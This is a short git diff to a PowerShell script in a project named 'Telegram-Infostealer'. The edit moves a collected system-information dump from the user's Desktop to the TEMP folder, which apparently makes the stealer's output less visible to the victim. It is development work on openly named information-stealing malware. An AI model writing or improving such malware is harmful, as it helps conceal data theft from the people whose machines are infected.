diff --git a/Telegram-Infostealer/main.ps1 b/Telegram-Infostealer/main.ps1 index 1e55a24..6aad1c2 100644 --- a/Telegram-Infostealer/main.ps1 +++ b/Telegram-Infostealer/main.ps1 @@ -259,7 +259,7 @@ $process ==================================================================================================================================" -$outpath = "$env:USERPROFILE/Desktop/systeminfo.txt" +$outpath = "$env:TEMP/systeminfo.txt" $contents | Out-File -FilePath $outpath -Encoding ASCII -Append $infomessage2 | Out-File -FilePath $outpath -Encoding ASCII -Append